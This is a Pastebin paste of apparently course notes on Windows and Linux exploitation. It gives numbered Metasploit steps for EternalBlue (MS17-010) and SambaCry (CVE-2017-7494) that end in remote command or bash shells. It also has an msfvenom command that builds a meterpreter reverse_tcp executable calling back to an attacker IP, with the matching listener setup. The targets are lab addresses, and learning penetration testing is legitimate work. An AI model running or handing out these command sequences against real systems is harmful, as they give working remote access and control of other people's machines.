Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Netapi32.dll is a module that contains the Windows NET API used by applications to access a Microsoft network. netapi32.dll is a system process that is needed for your PC to work properly and it should not be removed. The version of Netapi.dll in Win Xp SP2 is vulnerable and allows the remote attacker to get the remote access of the machine.
- DCOM is an acronym that stands for Distributed Component Object Model is a protocol that enables software components to communicate directly over a network which by default runs in Win XP SP0-SP1 and Win Server 2000.
- https://lucideustech.blogspot.com/2017/12/the-eternal-exploitation-bible-lucideus.html
- Grade 2 Session 8
- =================
- Console Based Exploitation 3
- Windows 7 --> Eternal Blue
- Samba Cry --> Eternal Red
- Application Based Exploitation
- Payload Based Exploitation
- Post Exploitation --> Local Privilidge Escalation
- GUI Based Exploitation --> Armitage
- Console Based Exploitation 3
- ----------------------------
- Eternal Blue --> NSA Exploit leaked by Shadow Brokers
- EternalBlue-Double Pulsar
- dll --> Dynamic Linked Library File
- Double Pulsar creates a malicious .dll file and eternal blue executes that malicious .dll file in the target system.
- Shadow Brokers ---> Fuzzbunch.py
- Empire --> MSF of NSA
- Metasploit Module
- Steps
- =====
- Open a terminal
- 1. #arp-scan --local
- Target IP Address --> 192.168.228.138
- 2. #nmap 192.168.228.138
- 3. #nmap -sS -sC -sV 192.168.228.138
- 4. #nmap 192.168.228.138 --script vuln
- CVE-2017-0143
- Open another terminal, start metasploit framework
- 5. #msfconsole
- 6. #search CVE-2017-0143
- 7. #use auxiliary/scanner/smb/smb_ms17_010
- 8. #options
- 9. #set rhosts 192.168.228.138
- 10. #options
- 11. #run
- Host is vulnerable to the exploit
- 12. #use exploit/windows/smb/ms17_010_eternalblue
- 13. #show options
- 14. #set rhost 192.168.228.138
- 15. #options
- 16. #exploit
- C:/Windows/System32> --> I got the access of the command prompt
- For Changing the payload
- set payload windows/meterpreter/reverse_tcp
- Samba Cry - Eternal Red
- =======================
- Is the vulnerability for Linux Based OS. SMBv2.
- NSA Exploit leaked by Shadow Brokers.
- Open a terminal
- 1. #arp-scan --local
- Target IP Address --> 192.168.228.151
- 2. #nmap 192.168.228.151
- 3. #nmap -sS -sC -sV 192.168.228.151
- 4. #nmap 192.168.228.151 --script vuln
- Open another terminal, start metasploit framework
- 5. #search is_known_pipename
- 6. #search cve-2017-7494
- exploit/linux/samba/is_known_pipename
- 7. #use exploit/linux/samba/is_known_pipename
- 8. #info
- 9. #options
- 10. #set rhost 192.168.228.151
- 11. #run
- Will Give me raw shell --> Bash Shell
- Application Based Exploitation
- ==============================
- Open the terminal, start with msfconsole
- 1. #msfconsole
- 2. #search payload/windows/meterpreter
- payload/windows/meterpreter/reverse_tcp --> use
- payload/windows/meterpreter_reverse_tcp
- payload/windows/meterpreter/reverse_http
- payload/windows/meterpreter_reverse_tcp
- Open Another Terminal, for creating a payload - stub
- 3. msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.25 lport=8989 -f exe > /root/Desktop/prasheel.exe
- -p --> selecting the payload
- windows/meterpreter/reverse_tcp --> is the payload
- lhost --> attacker's IP Address
- lport --> Listening attacker's port
- -f --> file format
- exe --> executable file
- > --> destination of the output
- /root/Desktop/prasheel.exe --> is the output file
- Go back to the first terminal, exploit, set the listening server
- 4. #use exploit/multi/handler
- 5. #show options
- 6. #set payload windows/meterpreter/reverse_tcp
- 7. #show options
- 8. #set lport 8989
- 9. #set lhost 192.168.0.25
- 10. #exploit
- Armitage --> GUI Based Exploitation
- Graphical Version of Metasploit Framework
Add Comment
Please, Sign In to add comment